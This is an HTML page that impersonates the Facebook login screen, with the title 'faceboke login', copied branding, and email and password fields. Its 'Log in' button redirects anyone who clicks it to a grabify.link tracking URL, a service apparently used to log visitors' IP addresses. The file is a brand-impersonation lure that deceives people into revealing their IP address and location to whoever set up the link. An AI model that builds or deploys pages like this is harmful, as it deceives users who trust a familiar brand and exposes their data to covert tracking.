<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
            <title>faceboke login</title>
                <link rel="stylesheet" href="style.css" />
    <style>
            body {
                background-color: #f2f4f7;
            }

            .title {
                color: #0866ff;
                font-weight: 800;
                font-size: 60px;
                text-align: center;
                font-family: "Mulish", sans-serif;

                margin-top: 30px;
            }
    </style>
   </head>
        <body>
            <p class="title">facebook</p>


            <p class="description">
            facebook helps you connect and <br />
            share with the people in your life.
             </p>

             <style>
            .description {
                text-align: center;
                margin-top: -50px;
                font-size: 24px;
                font-weight: 500;
                font-family: "Mulish",sans-serif;
            }
            </style>

                                         <div class="outer-container">
                                        <style>
                                       .outer-container {
                                         display: flex;
                                        justify-content: center;
            }
        </style>
                         <div class="inner-container">
         <style>
            .inner-container {
                background-color: white;
                width: 370px;
                display: flex;
                flex-direction: column;
                justify-content: center;
                margin-top: 10px;
                padding: 18px;
                border-radius: 7px;
                -webkit-border-radius: 7px;
                -moz-border-radius: 7px;
                -ms-border-radius: 7px;
                -o-border-radius: 7px;
                box-shadow: 0px 3px 6px rgba(128, 128, 128, 0.5);
            }
        </style>
        <input type="email" placeholder="Email address or phone number" />
        <input class="secInput" type="password" placeholder="password" />
        
        <style>
        input {
                height: 50px;
                border: 1px solid rgba(128, 128, 128, 0.5);
                border-radius: 5px;
                -webkit-border-radius: 5px;
                -moz-border-radius: 5px;
                -ms-border-radius: 5px;
                -o-border-radius: 5px;
                font-size: 14px; 

                 padding: 0 15px;
        }

            input::placeholder {
                font-weight: 500;
                font-size: 16px;
                color: rgba(128, 128, 128, 0.5);
            }

            .secInput {
                margin-top: 15px;
                margin-bottom: 15px;
            }
        </style>

        <button onclick="window.location.href='https://grabify.link/XPMW0U'">Log in</button>
        <p class="forgotten">Forgotten password</p>

        <div class="hr"></div>
        <div class="signup-container">
            <button class="signup">create new account</button>
            <style>
                button {
                    height: 48px;
                    font-size: 18px;
                    color: white;
                    font-weight: 600;
                    background-color: #0866ff;
                    border: none;
                    border-radius: 7px;
                    -webkit-border-radius: 7px;
                    -moz-border-radius: 7px;
                    -ms-border-radius: 7px;
                    -o-border-radius: 7px;
                    cursor: pointer;
                }

                button:hover {
                    opacity: 0.9;
                }

                .signup-container {
                    display: flex;
                    justify-content: center;
                }
                
                .forgotten {
                    color: #0866ff;
                    text-align: center;
                    font-family: "Mulish", sans-serif;
                    font-weight: 600;
                    font-size: 15px;
                    cursor: pointer;
                }

                .forgotten:hover {
                    text-decoration: underline;
                }

                .hr {
                    height: 1px;
                    background-color: rgba(192, 192, 192, 0.562);
                    margin-bottom: 20px;
                }

                .signup {
                    background-color: #42b72a;
                    width: 200px;
                }
            </style>
                </div>
            </div>
        </div>
    </body>
</html> 
